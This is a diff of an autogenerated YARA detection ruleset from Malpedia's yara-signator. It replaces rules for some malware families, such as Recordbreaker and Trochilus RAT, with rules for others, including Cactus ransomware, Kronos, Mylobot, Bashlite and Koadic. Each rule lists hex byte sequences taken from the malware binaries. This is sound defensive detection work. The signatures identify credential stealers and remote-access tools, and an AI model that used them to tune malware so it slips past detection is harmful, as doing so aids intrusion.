-		$sequence_6 = { 4c8d4dd0 418bc4 41f7e0 c1ea05 0fbec2 6bc83a 418ac0 }
-		$sequence_7 = { 488d8424a8000000 4889442420 48895c2428 488933 48897308 b950000000 e8???????? }
-		$sequence_8 = { 83f901 752f 488bca e8???????? 448be0 eb22 }
-		$sequence_9 = { 57 488bec 4883ec40 448ada 488bf1 4883c120 488d55f0 }
+		$sequence_0 = { 56 33db 53 6801001f00 ff15???????? 3bc3 }
+		$sequence_1 = { 770f 0fb7c2 0fbe80e8014100 83e00f eb02 }
+		$sequence_2 = { c1f905 8d3c8da0dd4000 8bf0 83e61f c1e606 }
+		$sequence_3 = { 50 8d85c03fffff 50 e8???????? 59 59 85c0 }
+		$sequence_4 = { a1???????? 33c5 8945fc ff7508 8d85e04fffff 56 }
+		$sequence_5 = { 56 50 e8???????? 8b85e44fffff 83c40c }
+		$sequence_6 = { c1f905 8b0c8da0dd4000 83e01f c1e006 f644080401 74cd }
+		$sequence_7 = { c785fcfefffff4f4f4f4 c78500fffffff4f4f4f4 c78504fffffff4f4f4f4 c78508fffffff4f4f4f4 }
+		$sequence_8 = { c745a0808084b7 c745a4989b8791 c745a8bc959a90 c745ac9891f4f4 c745b0f4f4f4f4 c745b4f4f4f4f4 }
+		$sequence_9 = { c745b8f4f4f4f4 c745bcf4f4f4f4 c745c0f4f4f4f4 c745c4f4f4f4f4 }
 
 	condition:
-		7 of them and filesize < 798720
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Recordbreaker_Auto : FILE
+rule MALPEDIA_Win_Cactus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "84c578f1-7563-5244-9c52-c15658d206fd"
+		id = "eb289dca-899a-5588-9223-1deb6b75b964"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.recordbreaker_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cactus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cactus_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "47ce2cf43e0dd275e8c2b25425755b57837a7a72d47324aa716f84b51ead687c"
+		logic_hash = "c959580feec97f87bfc35165a408b3d9e2aec2dc4a519f266c222421b5acd4bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111440,32 +111532,32 @@ rule MALPEDIA_Win_Recordbreaker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b15???????? 8bc8 e8???????? 8b55f0 }
-		$sequence_1 = { 8a040e 46 8802 42 3bf3 72f5 }
-		$sequence_2 = { 51 8d4de4 51 ff750c a5 }
-		$sequence_3 = { ff15???????? 33c0 40 eb08 ff15???????? 33c0 5f }
-		$sequence_4 = { 8365f800 a1???????? c745f464000000 53 56 }
-		$sequence_5 = { 33c0 50 6800000008 6a02 50 50 }
-		$sequence_6 = { ba04010000 8d0c41 51 8d85d0fdffff 50 }
-		$sequence_7 = { ff15???????? 8b7508 83c410 8bd3 }
-		$sequence_8 = { 8b15???????? 8bc8 e8???????? 8b55f8 }
-		$sequence_9 = { 81ec68040000 837d1002 53 56 8bf2 57 }
+		$sequence_0 = { e8???????? 85c0 0f843e010000 488d1592b52000 4889d9 e8???????? 85c0 }
+		$sequence_1 = { e8???????? e8???????? 4c8d05d3572000 baf10c0000 488d0d7f562000 e8???????? 4531c0 }
+		$sequence_2 = { ffd7 8b18 4180fd01 76e1 4584f6 759b e8???????? }
+		$sequence_3 = { e8???????? 4531c0 ba00010c00 b90d000000 e8???????? 4889e9 e8???????? }
+		$sequence_4 = { e8???????? 4889c1 e8???????? 488b4b30 4889c2 488b4328 488b4078 }
+		$sequence_5 = { eb99 c744243806000000 6690 f6431830 0f85cffdffff 488d35df063a00 e9???????? }
+		$sequence_6 = { e9???????? e8???????? 4c8d056ab43a00 bad6000000 4889e9 e8???????? 4531c0 }
+		$sequence_7 = { e8???????? 488b4b10 e8???????? 85c0 0f85b4000000 488b8b90000000 bf01000000 }
+		$sequence_8 = { e8???????? 4989d8 4889fa 4889f1 e8???????? 488d542423 4989d8 }
+		$sequence_9 = { bacb010000 488d0d282d3b00 e8???????? 4531c0 ba00010c00 b939000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 232312
+		7 of them and filesize < 13587456
 }
-rule MALPEDIA_Win_Bluenoroff_Auto : FILE
+rule MALPEDIA_Win_Kronos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "715350ff-965b-560c-8af6-f01ef8d9887d"
+		id = "926e3174-18bd-5768-8bad-aee020442946"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bluenoroff_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kronos_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "09078eca5d74bcdca0f6c272495f67d2206bb2b723aa1a39684e4df83692420a"
+		logic_hash = "37c4a3cedbb07e112b6f5ea1747119314006e52be9a57885219c4b994f74b249"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111479,32 +111571,32 @@ rule MALPEDIA_Win_Bluenoroff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 33ff 53 ff15???????? 8b450c }
-		$sequence_1 = { 8bf0 83c404 85f6 7429 8b4508 8b5510 }
-		$sequence_2 = { 8bf8 85ff 7421 6a00 8d55fc 52 56 }
-		$sequence_3 = { b912010000 8bf3 f3a5 a1???????? 8b5004 83c410 8d7004 }
-		$sequence_4 = { 83c41c 83f801 750e 8d8dfcfffeff }
-		$sequence_5 = { 83feff 7433 8d4e01 51 6a40 ff15???????? }
-		$sequence_6 = { 51 52 8d85fcfffeff 68ffff0000 }
-		$sequence_7 = { 83c41c 8d95ecfffeff 33c9 52 }
-		$sequence_8 = { 7433 8d4e01 51 6a40 }
-		$sequence_9 = { 8d8dfcfffeff 51 68???????? eb23 83f802 }
+		$sequence_0 = { 51 8bca e8???????? 8b4510 015f0c 8b4f0c 33d2 }
+		$sequence_1 = { 8b4508 8b4d10 5f 5b c70000000000 }
+		$sequence_2 = { e8???????? 83450810 83451010 ff4d0c 837d0c00 7fe2 }
+		$sequence_3 = { 8955f4 8975f8 bfff000000 3935???????? 754a c705????????01000000 53 }
+		$sequence_4 = { 83c40c 837dfc02 724b 8b55f4 83c208 52 8d4de0 }
+		$sequence_5 = { 57 56 56 8d8da0efffff }
+		$sequence_6 = { 8945c8 3bc6 0f8406020000 bfd8010000 57 e8???????? }
+		$sequence_7 = { 53 ff15???????? 8b442418 5f 5e 5b 8be5 }
+		$sequence_8 = { 50 8d45e8 50 ffd2 8b4804 8b7008 }
+		$sequence_9 = { b84d5a0000 663901 0f857f010000 8b413c 03c1 813850450000 0f856e010000 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 1302528
 }
-rule MALPEDIA_Win_Bs2005_Auto : FILE
+rule MALPEDIA_Win_Adkoob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c222daf1-0291-5b44-a14d-9520773ee0b6"
+		id = "bebf573b-46be-5024-b08d-6d19c81fe200"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bs2005_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.adkoob_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2de8be623d8c0993a0484485024d355fd2aa58f75e717b2fbd75b321c706b20a"
+		logic_hash = "9df45dbba7685f4e50394d5dc1c9c28bf484da1b0409fe46575f0443f2099dc5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111518,32 +111610,32 @@ rule MALPEDIA_Win_Bs2005_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40 84c9 75f9 6a00 8d8dccfeffff 51 2bc2 }
-		$sequence_1 = { c705????????14864000 a3???????? c705????????408f4000 c705????????30864000 c705????????92854000 }
-		$sequence_2 = { 8bcf 2bce 81e91c010c00 51 8d5705 52 83c020 }
-		$sequence_3 = { 52 6a04 50 8945e4 8b45e8 68???????? 50 }
-		$sequence_4 = { 8945f8 ba00040000 8bcf c60100 }
-		$sequence_5 = { 8b8e04010000 6a00 6a00 50 51 c745fc00000000 }
-		$sequence_6 = { 8b06 85c0 7425 8b10 50 }
-		$sequence_7 = { 75f9 b900000400 8d860c010c00 c60000 40 49 75f9 }
-		$sequence_8 = { 8b860c010000 3d00000200 7205 b800000200 8b8e04010000 6a00 }
-		$sequence_9 = { 6a00 8d55fc 52 50 8d8612010000 50 51 }
+		$sequence_0 = { 8d4eb0 8b4004 c74430980c4b4c00 8b4698 8b5004 8d4298 89443294 }
+		$sequence_1 = { 8b45f8 53 ff75fc 50 6a7e 5a 8bcf }
+		$sequence_2 = { 894638 85c0 740f 68???????? 50 ff15???????? 894640 }
+		$sequence_3 = { 898424fc000000 33c0 898424f8000000 89842400010000 89842404010000 8a83a4010000 88443134 }
+		$sequence_4 = { 897dec 8945fc 85ff 741b 8b7508 8bcf 56 }
+		$sequence_5 = { b8???????? e8???????? 8bf2 8bf9 89bd0cffffff 33c0 898508ffffff }
+		$sequence_6 = { 8bf9 83fb1c 7517 837f2400 7511 ff750c 8b5508 }
+		$sequence_7 = { 8d4e28 51 8d4e20 f7de 8b10 1bf6 23f1 }
+		$sequence_8 = { 8b4714 8945f8 81e1f7ff0000 8bd3 66894f18 8bce e8???????? }
+		$sequence_9 = { ff75c4 ffb540ffffff e8???????? 83c428 837da400 741a ffb56cffffff }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 1867776
 }
-rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE
+rule MALPEDIA_Win_Temp_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2ae48584-3f0a-5429-8e37-f6d8d22f0c81"
+		id = "06945ffb-74bb-55c6-897c-840bc8a35717"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealer_0x3401_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.temp_stealer_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "d48e39ba989936cedf7a0bb5dfb1b2a5b1f5da933f4aa10a0b47e5b061091dba"
+		logic_hash = "0687eb315a2ca722457708cc43ae8e72e82f9cde0b8833cdb29551011317ae50"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111557,32 +111649,32 @@ rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e03f 6bc830 8b0495c8710210 8b440818 83f8ff 7409 }
-		$sequence_1 = { c685d07dffff00 83f808 720d 40 50 ffb5487effff }
-		$sequence_2 = { 68???????? 8bd0 c645fc21 8d4d90 e8???????? }
-		$sequence_3 = { 8d45bc 837dd010 c745cc01000000 0f4345bc c6400100 8d8578ffffff 50 }
-		$sequence_4 = { 660fd645bc f30f7e05???????? 8945b4 a1???????? c78500ffffff3f3f3f00 c78523ffffff00000000 }
-		$sequence_5 = { 50 b9???????? c645fc19 e8???????? 8d4d90 }
-		$sequence_6 = { 735f 8bc6 8bfe 83e03f c1ff06 6bd830 8b04bdc8710210 }
-		$sequence_7 = { 7534 40 83f8fe 0f8798020000 3bc8 7310 ff7710 }
-		$sequence_8 = { 49 83c9fe 41 99 898cb558f0ffff 2bc2 }
-		$sequence_9 = { 0f95c0 8985a8feffff 3bf7 741f 6690 68???????? 8bcb }
+		$sequence_0 = { 488b4d08 e8???????? 4403f7 4883c330 443bb518020000 0f8c37ffffff 488b5d00 }
+		$sequence_1 = { 488d1537b00300 488bcb ff15???????? 488945b0 488d1533b00300 488bcb ff15???????? }
+		$sequence_2 = { f20f58cb f20f58cf f20f102d???????? 488d1592e10100 f20f59ee f2430f1004c1 }
+		$sequence_3 = { 4533c0 baa00f0000 e8???????? 488b05???????? 4c8d05f52b0300 488bd5 48c1fa06 }
+		$sequence_4 = { 488d0526dc0100 483947f0 741a 488b0f 4885c9 7412 833900 }
+		$sequence_5 = { 90 488b8d80000000 e8???????? 90 498bcd }
+		$sequence_6 = { 488b13 48c1e205 4883c208 488bcb e8???????? 90 4183660800 }
+		$sequence_7 = { 894708 488d5901 41bf20000000 418bc7 48f7e3 498d4fdf 480f40c1 }
+		$sequence_8 = { 48895c2478 488d5530 488d4c2460 e8???????? 90 488d5580 }
+		$sequence_9 = { 90 488d442440 48894558 4c897c2440 4c897c2450 48895c2458 488d153cc80300 }
 
 	condition:
-		7 of them and filesize < 357376
+		7 of them and filesize < 652288
 }
-rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE
+rule MALPEDIA_Win_Zerocleare_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e944258-6f12-5085-8358-b91fb7dc5a09"
+		id = "44db0221-dc66-5a41-bbf8-146a25155baf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.trochilus_rat_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zerocleare_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "dca7f9603da83736d27e78d66d52610b99014fe1a1d949a52b24e5b787c59a8a"
+		logic_hash = "e4821dd22695093410a23835df9e39372b43fe15a2de70debfb45b9cb2592dab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111596,32 +111688,32 @@ rule MALPEDIA_Win_Trochilus_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8410010000 8b3d???????? 6894e40010 53 ffd7 85c0 0f84fa000000 }
-		$sequence_1 = { 7405 6a02 5e ebc6 e8???????? eb25 e8???????? }
-		$sequence_2 = { 2bf9 f7df 1bff 23f8 0f849a000000 8b4708 }
-		$sequence_3 = { 53 57 8d4e2c 8bf8 2bf9 f7df 1bff }
-		$sequence_4 = { 56 8bf1 c706d0d10010 e8???????? f6450801 7407 56 }
-		$sequence_5 = { 8b4dfc 8b06 b201 d2e2 081438 663b5d0c 740e }
-		$sequence_6 = { 50 6a06 8d85ecfbffff 50 8bcf }
-		$sequence_7 = { ff7510 8b01 ff750c ff5034 6a00 ff7508 8bfe }
-		$sequence_8 = { 8bce e8???????? eba2 55 8bec 83ec0c 56 }
-		$sequence_9 = { a1???????? c705????????90897e00 8935???????? a3???????? ff15???????? a3???????? }
+		$sequence_0 = { 8d45d0 837de408 68???????? 0f4345d0 68000000c0 50 e8???????? }
+		$sequence_1 = { ff249d01c04000 8b46e4 3b42e4 744f 0fb6f8 0fb642e4 2bf8 }
+		$sequence_2 = { 8b049d40fd4400 f644082801 7469 56 }
+		$sequence_3 = { 8b0cb540fd4400 83c410 8985f4efffff 8bc2 8b95f4efffff }
+		$sequence_4 = { 6a05 e8???????? 83c404 6a00 ff74f704 ff34f7 }
+		$sequence_5 = { 56 8b7508 ff34b5109f4300 e8???????? 50 ff34b52c9f4300 8d4dec }
+		$sequence_6 = { 7cde 68???????? e8???????? 8b8504f8ffff }
+		$sequence_7 = { 83c404 89460c 83fa08 722e }
+		$sequence_8 = { 833d????????00 0f852ce4ffff 8d0dc0524400 ba1b000000 e9???????? a900000080 }
+		$sequence_9 = { c7401000000000 c7401407000000 668908 c645fc04 8b9530f7ffff 83fa08 727f }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 42670080
 }
-rule MALPEDIA_Win_Coredn_Auto : FILE
+rule MALPEDIA_Win_Mylobot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "07ee8205-8782-52d9-9a53-818875f21066"
+		id = "f7dde5ee-bede-5ac3-b3eb-6e299ffacf3b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coredn_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mylobot_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "67a00f5807f423f86c2e11cef6a3e34c3be3d717b80668bf24ae3e2d19c2ab6b"
+		logic_hash = "56cc02e4b48743c53b559e650312c78d0538beee90fc9e32cc4b9fd49244eca7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111635,76 +111727,77 @@ rule MALPEDIA_Win_Coredn_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 56 8d45fc 8bf1 50 e8???????? 85c0 }
-		$sequence_1 = { 8b7508 ba04010000 2bf1 6690 }
-		$sequence_2 = { 84c0 7415 8801 41 83ea01 }
-		$sequence_3 = { 5e 8be5 5d c20400 85c9 7506 48 }
-		$sequence_4 = { 8a1c06 84db 741c 8818 4a 40 83e901 }
-		$sequence_5 = { 0f1f440000 3811 7408 41 83e801 75f6 eb04 }
-		$sequence_6 = { 41 83ea01 75e7 8851ff b87a000780 5e }
-		$sequence_7 = { 75ec 48 bf7a000780 8808 8bc7 5f 5b }
-		$sequence_8 = { 85d2 7417 0fb73407 6685f6 740e }
-		$sequence_9 = { d3c8 3305???????? 3905???????? 0f8594070000 }
-		$sequence_10 = { 83e13f c1f806 6bc930 8b048508414100 }
-		$sequence_11 = { 8b30 8bd6 c1fa06 8bc6 83e03f 6bc830 8b049508414100 }
-		$sequence_12 = { eb57 53 8b1c85e8dd4000 56 6800080000 6a00 53 }
-		$sequence_13 = { b802000000 833d????????00 0f85b00a0000 8d0d60104100 }
-		$sequence_14 = { 8b0c8d08414100 c644112800 85f6 740c 56 }
+		$sequence_0 = { 75f6 5e c3 8b442404 eb05 40 84c9 }
+		$sequence_1 = { 6a00 6a00 8d8c24c4000000 51 }
+		$sequence_2 = { 8b54241c 891481 ff430c 8b4ff0 85c9 7502 }
+		$sequence_3 = { 8bf0 6aff 56 ff15???????? 56 ff15???????? 6810270000 }
+		$sequence_4 = { 5d 5e 5b 81c404080000 c3 8b4c2404 8b54240c }
+		$sequence_5 = { 42 84c9 75f6 5e c3 }
+		$sequence_6 = { ff96a8000000 50 ff5670 a1???????? 57 ff742410 ff742414 }
+		$sequence_7 = { 8b54240c 56 8b74240c 57 8bf9 2bf1 8bc2 }
+		$sequence_8 = { ff15???????? 85c0 0f8447010000 8b742438 85f6 0f843b010000 8b3d???????? }
+		$sequence_9 = { 51 8d8ddcfdffff e8???????? 83c404 85c0 }
+		$sequence_10 = { c3 ff15???????? 8b45f0 50 ff15???????? }
+		$sequence_11 = { b8???????? e8???????? 83c40c 85c0 0f84d9010000 }
+		$sequence_12 = { 8d4dfc 51 52 ffd0 8b45fc }
+		$sequence_13 = { 6a09 50 ffd2 8bf8 }
+		$sequence_14 = { 7416 8bff 0fb6d0 8a9c15dcfdffff 84db }
+		$sequence_15 = { 85c0 0f84c3000000 8b08 8d55f8 52 68???????? }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 8028160
 }
-rule MALPEDIA_Win_Sadbridge_Auto : FILE
+rule MALPEDIA_Win_Darkpink_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d5c20ad4-43c0-50c3-9d4c-1a951b87b122"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sadbridge"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sadbridge_auto.yar#L1-L133"
+		id = "b675ae58-304b-51cc-82c9-2d05a952daf3"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkpink_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "d280954e74300d3f9a45abc8f0031561691484da682361fb4efd2fdc22668bb8"
+		logic_hash = "ae61fd7de2751bb38bc52ea4bef7ef6d5cc9562894ba78123146d52f1f8217ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48c7435800000000 4c89e1 48c7436000000000 48c7436800000000 48c7437000020000 66894378 }
-		$sequence_1 = { 31d2 83e001 05ffffff7f 8944245c 41f7f5 89442458 488d869c000000 }
-		$sequence_2 = { 0f8568fcffff 488b4570 448920 e9???????? 488b01 ff5048 83f8ff }
-		$sequence_3 = { 53 4883ec28 4889542478 4989cd 4c89842480000000 4839d1 0f843f010000 }
-		$sequence_4 = { 400f94c6 4885c0 0f94c2 4809c1 0f8489020000 8b842498000000 4531f6 }
-		$sequence_5 = { 31d0 29d0 83f864 0f9fc0 0fb6c0 4883c428 5b }
-		$sequence_6 = { 49c744240800000000 498d4c2438 49c744241000000000 488d7810 49893c24 49c744241800000000 49c744242000000000 }
-		$sequence_7 = { 41ba01000000 4885c9 741e 488b4110 483b4118 0f83ad020000 0fb700 }
-		$sequence_8 = { 488b4c2470 448b6c2478 4885c9 740a 4183fdff 0f84a7030000 4084ff }
-		$sequence_9 = { 745c 498b4c2410 4839cb 7732 4d85c0 7416 4a8d0c50 }
+		$sequence_0 = { 0f8579010000 8b35???????? 68a6000000 68???????? 6a01 50 }
+		$sequence_1 = { ffd3 85c0 7530 6a32 }
+		$sequence_2 = { c1f806 6bc938 8b0485f09d4100 0fb6440828 83e040 5d }
+		$sequence_3 = { c745e4a8604100 eb07 c745e494604100 8b4508 }
+		$sequence_4 = { 8b04bdf09d4100 ff743018 ff15???????? 85c0 7404 }
+		$sequence_5 = { 56 57 e8???????? 57 68???????? 53 }
+		$sequence_6 = { 85f6 7420 6bc618 57 8db8f09b4100 }
+		$sequence_7 = { 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
+		$sequence_8 = { 83e73f c1f906 6bd738 8b0c8df09d4100 c644112800 }
+		$sequence_9 = { 8bcf 83e03f c1f906 6bd038 8b45fc 03148df09d4100 }
 
 	condition:
-		7 of them and filesize < 25882624
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Dramnudge_Auto : FILE
+rule MALPEDIA_Elf_Bashlite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4e1e9905-62de-5567-9ed7-a82928870a8c"
+		id = "bbeb65b7-8b2b-54dc-9314-a8bcbc56853e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dramnudge_auto.yar#L1-L90"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.bashlite_auto.yar#L1-L94"
 		license_url = "N/A"
-		logic_hash = "221dd8bcd930b6121a924fbe6761de15c83c657ddce0c9178183beb8828f75f7"
+		logic_hash = "98d7f6d0b73040daa4a477a42fca0025382c8a865bb2020813f6076b3c9fb152"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111718,30 +111811,30 @@ rule MALPEDIA_Win_Dramnudge_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 014218 eb18 03c3 8bd3 }
-		$sequence_1 = { 000c00 20b140005f5f 7277 7374 }
-		$sequence_2 = { 014318 8b430c 2b4308 03c6 }
-		$sequence_3 = { 000c00 e0d9 40 007374 }
-		$sequence_4 = { 014318 8b4318 8b55f8 03d6 }
-		$sequence_5 = { 007374 643a3a 7275 6e }
-		$sequence_6 = { 0000 90 000c00 20b140005f5f }
-		$sequence_7 = { 014318 eb5b 33f6 eb01 }
+		$sequence_0 = { 85c0 750c c785ecefffff01000000 eb0a c785ecefffff00000000 }
+		$sequence_1 = { f7d0 21d0 3345fc c9 c3 }
+		$sequence_2 = { e8???????? 8945ec 837dec00 750b }
+		$sequence_3 = { 89c2 89d0 c1e81f 01d0 }
+		$sequence_4 = { 83f8ff 750c e8???????? 8b00 83f873 }
+		$sequence_5 = { 760f e8???????? c7001c000000 31c0 }
+		$sequence_6 = { eb0a c785ecefffff00000000 8b85ecefffff c9 }
+		$sequence_7 = { eb19 e8???????? c70016000000 e8???????? c70016000000 }
 
 	condition:
-		7 of them and filesize < 1294336
+		7 of them and filesize < 2310144
 }
-rule MALPEDIA_Win_Funny_Dream_Auto : FILE
+rule MALPEDIA_Win_Koadic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c5b8541-25d5-552c-920a-b086563867d9"
+		id = "90cb2869-83e9-5158-9659-47bf570b7e5e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.funny_dream_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.koadic_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "d6d8f879d884c791eab9cf877f711b463f1b8fd3433301e06ffb4b2f059a3774"
+		logic_hash = "d8659459b0b0216a7ee3a53301a133024a4e0a3aca2952b29c3bef6ea3dd8620"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111755,34 +111848,34 @@ rule MALPEDIA_Win_Funny_Dream_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8bd8 c745f025735c2a 56 8d45f0 }
-		$sequence_1 = { 8d7f01 88443bff 84c0 75f3 8b4df8 }
-		$sequence_2 = { 50 8d4701 c785e0f5ffff0a000000 50 }
-		$sequence_3 = { 50 e8???????? 68ff010000 8d85fdfdffff 6a00 }
-		$sequence_4 = { f3a4 50 e8???????? 8b742414 83c408 85c0 748d }
-		$sequence_5 = { 83bdacfeffff00 744b 8d85a0feffff c785a0feffff00010000 50 ffb59cfeffff }
-		$sequence_6 = { 57 8bf9 6a00 8db750100000 56 ff15???????? 85c0 }
-		$sequence_7 = { 56 8b7508 57 8b3d???????? 6aff ff7608 ffd7 }
-		$sequence_8 = { 53 8a4810 8d4602 50 884e01 e8???????? 8b4508 }
-		$sequence_9 = { 0f118424e0000000 0f10842458010000 0f118424f0000000 e8???????? 898424c8000000 8b4508 }
+		$sequence_0 = { 50 58 89450c 8b0424 50 58 894510 }
+		$sequence_1 = { 884c3410 85db 75d4 85f6 7e0c 8a4c3410 }
